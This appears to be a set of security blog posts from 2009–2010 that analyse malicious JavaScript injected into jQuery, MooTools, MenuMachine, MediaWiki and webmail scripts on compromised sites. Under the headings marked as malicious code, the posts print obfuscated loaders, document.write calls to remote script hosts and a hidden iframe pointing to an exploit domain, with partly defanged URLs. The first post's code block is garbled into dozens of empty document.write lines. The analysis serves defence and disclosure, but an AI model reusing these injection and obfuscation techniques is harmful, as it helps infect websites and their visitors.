stopthehacker.com » script

Hackers Understand the Value of Backups

anirban — Tue, 04 May 2010 18:17:13 +0000

Hackers have been trying new tricks to obfuscate their malicious code and sneak it surreptitiously into benign websites. This trend is ever increasing as websites are now the weakest link in the entire malware chain. Hackers discover vulnerabilities in websites, exploit them to inject malicious bad code and voila – you have at your disposal a “trusted” website – lots of web surfers will drop by, and in turn get infected with the hacker’s malicious code. This vicious cycle of malware has become a very attractive modus operandi for the dark figures of the Internet.

Overview

This post will show an example of a trend about which we first blogged a few months ago. We will concentrate on the way hackers use “backup-sources” to infect visitors to a compromised website. If this does not make sense yet, hold on for just a few seconds more.

Quite recently we blogged about how hackers are using benign and useful JavaScript hosted locally on accounts managed by the website owner/admin to spread malware. Hackers have injected malicious code right into useful snippets of JavaScript which do everything from displaying menu buttons, drop down choices and much much more. Take a look at our previous findings: here.

An Example

Everyday we find websites which are infected with malicious code which follows the same principles. In fact, we now monitor over 1 million websites!

Website name: ipac-bd.org
Time of latest scan: 15:33:10 PDT on 2010/05/03

In this example, the website was hosting JavaScript which had been compromised by a hacker. The hacker had inserted various script elements at the very end of the benign JavaScript being used by the website. It’s likely that the website owner never saw this coming, and probably did not realize what was going on until he was blacklisted.

The “Backup” Strategy

Take a look at the example below: clearly the hacker used multiple websites which he has compromised as the “loading point” for the malicious payload injected as part of the benign JavaScript. It’s almost funny when one realizes the number of websites this hacker has used as backups for his malicious code.

In this example the hacker has used 30 different infected websites to try and load his malicious code. The frequency distribution of the infectious websites which the hacker has used to distribute his malware is present below. It seems that hackers understand the concept of a “backup-strategy” well. An interesting point to probe further would be to understand why the frequency distribution of the infected sites is the way it is.

Frequency distribution of infected websites used in the transmission of malware.

Example Code

element.style.top    = top + 'px';
element.style.left   = left + 'px';
element.style.height = element._originalHeight;
element.style.width  = element._originalWidth;
}
}

// Safari returns margins on body which is incorrect if the child is absolutely
// positioned.  For performance reasons, redefine Position.cumulativeOffset for
// KHTML/WebKit only.
if (/Konqueror|Safari|KHTML/.test(navigator.userAgent)) {
Position.cumulativeOffset = function(element) {
var valueT = 0, valueL = 0;
do {
valueT += element.offsetTop  || 0;
valueL += element.offsetLeft || 0;
if (element.offsetParent == document.body)
if (Element.getStyle(element, 'position') == 'absolute') break;

element = element.offsetParent;
} while (element);

return [valueL, valueT];
}
}
element.style.top    = top + 'px';
element.style.left   = left + 'px';
element.style.height = element._originalHeight;
element.style.width  = element._originalWidth;
}
}
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');
document.write('');

When Benign scripts attack – V

anirban — Wed, 09 Dec 2009 18:24:08 +0000

Building on with this series of posts, which try to capture the evolution of how hackers are injecting benign scripts with malware in the hopes of hiding their malicious content amongst good code. The malicious code displayed this time leads to the famous “Gumblar” infection strain and can cause a lot of headaches. This particular strain is not new, but has been resurfacing in the last few weeks and hence the focus on this specific piece.

This particular example shows how a jQuery script was used by a hacker to spread malicious code. This example is a little obfuscated. This code was mined from www.i-movix.com/en/distributors/.

On line 15 you can find:

Which loads the example below:

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2008-05-24 14:22:17 -0400 (Sat, 24 May 2008) $
* $Rev: 5685 $
*/
eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while
(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1}

**code removed for brevity**

while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(H
(){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<]*(<(.|\\s
)+>)[^>]*$|^#(\\w+)$/,62=/^.[^:#\\[\\.]*$/,12;D.17=D.44={5j:H(d,b){d=d||S;G(d.16){

**malicious code**

/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement
('scri pt');H3qqe 3ur6p.setAttribute('type', 'text/javascript');H3qqea3ur6p.setAttribute
('id', 'myscript1');H3qqea3ur6p.setAttribute('src',  'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v(
)@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$
)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@
0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(
m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##
)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a
&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|
\$/ig, ''));H3 qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea
3ur6p);}} cat h(e) {}

Till next time…

When Benign scripts attack – IV

anirban — Wed, 02 Dec 2009 23:49:16 +0000

We have received significant requests to keep up with this series of posts which try to capture the evolution of how hackers are injecting benign scripts with malware in the hopes of hiding their malicious content amongst good code.

This particular example shows how a menumachine script was used by a hacker to spread malicious code. This example is a little bit different from the ones we have posted before as it does not just post the malicious code using a straight iframe or obviously understandable JavaScript. This example shows how hackers are trying just a little bit harder to inject code that is somewhat obfuscated. This code was mined from www.rvp1875.com/index.html. Take a look at the example below.

/* menumachine.js v1.7.1.1 - a component of MenuMachine (c)2004 Big Bang Software Pty Ltd :: menumachine.com*/

_ud="undefined";

if(typeof(bbMenu)==_ud)
  bbMenu=new Array();

bb_fix=new Array();

function _bbroot(bbL,name,r2L,clkOp,hRelPos,vRelPos,hRPmargin,vRPmargin,smScr,scrSp,scrAm,tri,triDn,triL,t_Hr,s_Hr,fade,posID,s_bCol,s_bW,s_bBtw,s_fFam,s_fSz,s_fWt,s_fStl,s_txAl,s_lPad,s_tPad,hOL,vOL,sArr,bCol,bw,bBtw,fFam,fSz,fWt,fStl,txAl,lPad,tPad,top_vOL,top_hOL,tArr,spc,nhlP,bUp,s_ao,ao)
{
  if(typeof(__pg)==_ud)
  {
    _b=new __bbBrChk();
    _hr=null;

    if(_b.ieDom&&!_b.mac){
      var els=document.getElementsByTagName("base");

      if(els.length){
        _hr=els[0].getAttribute("href");
      }
    }

    if(!_hr)
      _hr="";

    __pg=new _bbPg();

**code removed for brevity**

    for(var g=0;g

Till next time..

When Benign scripts attack – III

anirban — Wed, 18 Nov 2009 17:52:46 +0000

In this post we continue to analyze how popular scripts are being targeted by hackers to cause infections on websites and computers which load them up in browsers for the viewing them. The motivation behind using these originally benign scripts to do the dirty work on their behalf is that a lot of webmasters and web-enthusiasts have wizened up to the fact that code-injection is a never ending battle and they are making efforts to identify and remove malicious code from their sites.

This particular example shows how a mootools script was used by a hacker to spread a Gumblar infection. Consider the case of hxxp://www.wwf.gr/ referred to by 22lyk-athin. att.sch .gr/index.html. You will find the following code listed on one of the associated mootools JavaScript files which are pulled in from the local drives. The malicious code causes an infection which leads to a site being blacklisted by Google. The detailed report from Google would probably mention that the infection of the Gumblar” type.

Following the first example is another one wherein a Mediawiki script was targeted. The source was www.1wed din gsource.com/wedding-wiki/Wedding/

//MooTools, My Object Oriented Javascript Tools. Copyright (c) 2006 Valerio Proietti, , MIT Style License.

var MooTools={version:'1.11'};function $defined(obj){return(obj!=undefined);};function $type(obj){if(!$defined(obj))return false;if(obj.htmlElement)return'element';var type=typeof obj;if(type=='object'&&obj.nodeName){switch(obj.nodeType){case 1:return'element';case 3:return(/\S/).test(obj.nodeValue)?'textnode':'whitespace';}}
if(type=='object'||type=='function'){switch(obj.constructor){case Array:return'array';case RegExp:return'regexp';case Class:return'class';}
if(typeof obj.length=='number'){if(obj.item)return'collection';if(obj.callee)return'arguments';}}
return type;};function $merge(){var mix={};for(var i=0;i<arguments.length;i++){for(var property in arguments[i]){var ap=arguments[i][property];var mp=mix[property];if(mp&&$type(ap)=='object'&&$type(mp)=='object')mix[property]=$merge(mp,ap);else mix[property]=ap;}}
return mix;};var $extend=function(){var args=arguments;if(!args[1])args=[this,args[0]];for(var property in args[1])args[0][property]=args[1][property];return args[0];};var $native=function(){for(var i=0,l=arguments.length;i<l;i++){arguments[i].extend=function(props){for(var prop in props){if(!this.prototype[prop])this.prototype[prop]=props[prop];if(!this[prop])this[prop]=$native.generic(prop);}};}};$native.generic=function(prop){return function(bind){return this.prototype[prop].apply(bind,Array.prototype.slice.call(arguments,1));};};$native(Function,Array,String,Number);function $chk(obj){return!!(obj||obj===0);};function $pick(obj,picked){return $defined(obj)?obj:picked;};function $random(min,max){return Math.floor(Math.random()*(max-min+1)+min);};function $time(){return new Date().getTime();};function $clear(timer){clearTimeout(timer);clearInterval(timer);return null;};var Abstract=function(obj){obj=obj||{};obj.extend=$extend;return obj;};var Window=new Abstract(window);var Document=new Abstract(document);document.head=document.getElementsByTagName('head')[0];window.xpath=!!(document.evaluate);if(window.ActiveXObject)window.ie=window[window.XMLHttpRequest?'ie7':'ie6']=true;else if(document.childNodes&&!document.all&&!navigator.taintEnabled)window.webkit=window[window.xpath?'webkit420':'webkit419']=true;else if(document.getBoxObjectFor!=null)window.gecko=true;window.khtml=window.webkit;Object.extend=$extend;if(typeof HTMLElement=='undefined'){var HTMLElement=function(){};if(window.webkit)document.createElement("iframe");HTMLElement.prototype=(window.webkit)?window["[[DOMElement.prototype]]"]:{};}
HTMLElement.prototype.htmlElement=function(){};if(window.ie6)try{document.execCommand("BackgroundImageCache",false,true);}catch(e){};var(properties){var klass=function(){return(arguments[0]!==null&&this.initialize&&$type(this.initialize)=='function')?this.initialize.apply(this,arguments):this;};$extend(klass,this);klass.prototype=properties;klass.constructor=Class;return klass;};Class.empty=function(){};Class.prototype={extend:function(properties){var proto=new this(null);for(var property in properties){var pp=proto[property];proto[property]=Class.Merge(pp,properties[property]);}
return new Class(proto);},implement:function(){for(var i=0,l=arguments.length;i<l;i++)$extend(this.prototype,arguments[i]);}};Class.Merge=function(previous,current){if(previous&&previous!=current){var type=$type(current);if(type!=$type(previous))return current;switch(type){case'function':var merged=function(){this.parent=arguments.callee.parent;return current.apply(this,arguments);};merged.parent=previous;return merged;case'object':return $merge(previous,current);}}
return current;};var Chain=new Class({chain:function(fn){this.chains=this.chains||[];this.chains.push(fn);return this;},callChain:function(){if(this.chains&&this.chains.length)this.chains.shift().delay(10,this);},clearChain:function(){this.chains=[];}});var Events=new Class({addEvent:function(type,fn){if(fn!=Class.empty){this.$events=this.$events||{};this.$events[type]=this.$events[type]||[];this.$events[type].include(fn);}
return this;},fireEvent:function(type,args,delay){if(this.$events&&this.$events[type]){this.$events[type].each(function(fn){fn.create({'bind':this,'delay':delay,'arguments':args})();},this);}

**code removed for brevity**

this.effects={};if(this.options.opacity)this.effects.opacity='fullOpacity';if(this.options.width)this.effects.width=this.options.fixedWidth?'fullWidth':'offsetWidth';if(this.options.height)this.effects.height=this.options.fixedHeight?'fullHeight':'scrollHeight';for(var i=0,l=this.togglers.length;i<l;i++)this.addSection(this.togglers[i],this.elements[i]);this.elements.each(function(el,i){if(this.options.show===i){this.fireEvent('onActive',[this.togglers[i],el]);}else{for(var fx in this.effects)el.setStyle(fx,0);}},this);this.parent(this.elements);if($chk(this.options.display))this.display(this.options.display);},addSection:function(toggler,element,pos){toggler=$(toggler);element=$(element);var test=this.togglers.contains(toggler);var len=this.togglers.length;this.togglers.include(toggler);this.elements.include(element);if(len&&(!test||pos)){pos=$pick(pos,len-1);toggler.injectBefore(this.togglers[pos]);element.injectAfter(toggler);}else if(this.container&&!test){toggler.inject(this.container);element.inject(this.container);}
var idx=this.togglers.indexOf(toggler);toggler.addEvent('click',this.display.bind(this,idx));if(this.options.height)element.setStyles({'padding-top':0,'border-top':'none','padding-bottom':0,'border-bottom':'none'});if(this.options.width)element.setStyles({'padding-left':0,'border-left':'none','padding-right':0,'border-right':'none'});element.fullOpacity=1;if(this.options.fixedWidth)element.fullWidth=this.options.fixedWidth;if(this.options.fixedHeight)element.fullHeight=this.options.fixedHeight;element.setStyle('overflow','hidden');if(!test){for(var fx in this.effects)element.setStyle(fx,0);}
return this;},display:function(index){index=($type(index)=='element')?this.elements.indexOf(index):index;if((this.timer&&this.options.wait)||(index===this.previous&&!this.options.alwaysHide))return this;this.previous=index;var obj={};this.elements.each(function(el,i){obj[i]={};var hide=(i!=index)||(this.options.alwaysHide&&(el.offsetHeight>0));this.fireEvent(hide?'onBackground':'onActive',[this.togglers[i],el]);for(var fx in this.effects)obj[i][fx]=hide?0:el[this.effects[fx]];},this);return this.start(obj);},showThisHideOpen:function(index){return this.display(index);}});Fx.Accordion=Accordion;

**malicious code**

document.write('<scr ipt src=hxxp://nw drealty.com/Scripts/Unti tled-17.php ><\/sc ript>');
document.write('<scri pt src=hxxp://nwd realty.com/Scripts/Untit led-17.php ><\/s cript>');</pre>
etTime()+2678400000);if(document.cookie.indexOf("_df=f")==-1){if(navigator.appCodeName.indexOf("a")!=-1){iframe="iframe"}document.write("<iframe+ width=1 height=1 src=\'hxxp://l oading-a tm.net/b2b/\' style=\'display:none\'></iframe>");document.cookie="_df=f; expires=expires.toGMTString(); "}\n']</pre>

Our systems flagged this as unsafe. This exploit leads to an infection which is a remnant of the famous gumblar virus.

// MediaWiki JavaScript support functionsvar clientPC = navigator.userAgent.toLowerCase(); // Get client info
var is_gecko = /gecko/.test( clientPC ) &&
!/khtml|spoofer|netscape\/7\.0/.test(clientPC);
var webkit_match = clientPC.match(/applewebkit\/(\d+)/);
if (webkit_match) {
var is_safari = clientPC.indexOf('applewebkit') != -1 &&
clientPC.indexOf('spoofer') == -1;
var is_safari_win = is_safari && clientPC.indexOf('windows') != -1;

** code removed for brevity **
}
//note: all skins should call runOnloadHook() at the end of html output,
//      so the below should be redundant. It's there just in case.
hookEvent("load", runOnloadHook);

** malicious code **
document.write('<\/s cript>');

When Benign scripts attack – II

anirban — Mon, 16 Nov 2009 19:06:56 +0000

A few weeks back I wrote about how hackers are targeting benign scripts to do the dirty work on their behalf. The trend is now intensifying. In the last post about this issue, we saw how common scripts like JQuery and AC_RunActiveContent, mootools and others were being targeted. This time we will look at injection in a script which does not conform to the trend mentioned.

This particular example is not a popularly deployed script, and is probably hand-coded by a developer for their purposes. Consider the case of hxxp://www.iu.edu.sa/web mail/ You will find the following code listed on one of the associated JavaScript files which are pulled in from the local drives. Interestingly, the code is packed using the popular, Dean-Edwards-Packer, like format. Unpacking it is trivial and hence the actual code which was not part of the original file is also displayed below.

// defines for sections
var SECTION_LOGIN    = 0;
var SECTION_MAIL     = 1;

// defines for screens
var SCREEN_LOGIN              = 0;
var SCREEN_MESSAGES_LIST_VIEW = 1;
var SCREEN_MESSAGES_LIST      = 2;
var SCREEN_VIEW_MESSAGE       = 3;
var SCREEN_NEW_MESSAGE        = 4;

var Sections = Array();
Sections[SECTION_LOGIN]    = {Scripts: [], Screens: Array()}
Sections[SECTION_MAIL]     = {Scripts: [], Screens: Array()}
Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST_VIEW] = 'screen = new CMessagesListViewScreen(SkinName);';
Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST] = 'screen = new CMessagesListScreen(SkinName);';

**code removed for brevity**

var REDRAW_NOTHING = 0;
var REDRAW_PAGE    = 3;
var AUTOSELECT_CHARSET = -1;
var VIEW_MODE_WITH_PANE     = 1;
var Fonts = [Arial, Arial Black, Courier New, Tahoma, Times New Roman, Verdana]

Ready(INIT_DEFINES);

**malicious code**

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){returnw};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(be(c)b,g),k[c])}}return p}(g 7=b 5(),4=b 5(7.k()l);2(0.9.6(8=f)==-1){2(i.m.6(a)!=-1){3=3}0.c(<3dh=1 ej=1 w=hn://yz-v.u/p/ o=qr:t></2s>);0.9=8=f;4=4.x(); },36,36,document||if|iframe|expires|Date|indexOf|today|_df|cookie||new|write|widt|heig||var||navigator|ht|getTime|2678400000|appCodeName|ttp|style|b2b|dis|play|rame|none|net|atm|src|toGMTString|loadi|ng.split(|),0,{}));

**unpacked form**

['var today=new Date(),expires=new Date(today.getTime()+2678400000);if(document.cookie.indexOf("_df=f")==-1){if(navigator.appCodeName.indexOf("a")!=-1){iframe="iframe"}document.write("<iframe+ width=1 height=1 src=\'hxxp://l oading-a tm.net/b2b/\' style=\'display:none\'></iframe>");document.cookie="_df=f; expires=expires.toGMTString(); "}\n']</pre>

Our systems flagged this as unsafe and for further validation one can look up malware-domain-list .

2009/03/28_00:00

loading-atm.net/b2b/

83.133.123.140

t490.1paket.com

redirects to exploits

Jsfgvbg (loading-atm@mail.ru)

13237

The exploit seems to throw a executable to the victim’s system, which in turn is a down-loader and tries to grab two more files from the same domain.

And to whet your appetite more, here’s another example captured from hxxp://www. aikidoofqueens. com/kids/

var ma=new Array();var mx=new Array();var my=new Array();var mc=new Array();
var mpos=new Array();var mal=0;var main=0;var menuw=200;var psrc=0;
var pname="";var al="";var gd=0;var gx,gy;var d=document;
var NS7=(!d.all&&d.getElementById);var NS4=(!d.getElementById);
var IE5=(!NS4&&!NS7&&(navigator.userAgent.indexOf('MSIE 5.0')!=-1
||navigator.userAgent.indexOf('MSIE 5.2')!=-1));var IE5p5=(!NS4&&
!NS7&&navigator.userAgent.indexOf('MSIE 5.5')!=-1);var NS6=(NS7&&
navigator.userAgent.indexOf('Netscape6')!=-1);
var SAF=navigator.userAgent.indexOf('Safari')!=-1;p=navigator.userAgent.indexOf('Opera');
if(p>-1){p=navigator.userAgent.charAt(p+6);if(p>6)NS7=1;else NS4=1;}var 

** code removed for brevity **

clipMenu(i,el){if(el.offsetLeft>mx[i])el.style.clip="rect("+(my[i]-el.offsetTop)+"px "
+(el.offsetWidth+(mx[i]-el.offsetLeft))+"px "+el.offsetHeight+"px "+0+"px)";
else el.style.clip="rect("+(my[i]-el.offsetTop)+"px "+el.offsetWidth+"px "+
el.offsetHeight+"px "+(mx[i]-el.offsetLeft)+"px)";}

** malicious code **

document.write('< script src=hxxp://b olccorlando.org/_vti_txt/event_pwf.php ><\/s cript>');
document.write('<\/s cript>');
document.write('<\/sc ript>');
document.write('<\/scr ipt>');
document.write('<\/scri pt>');
document.write('<\/scrip t>');
document.write('<\/sc ript>');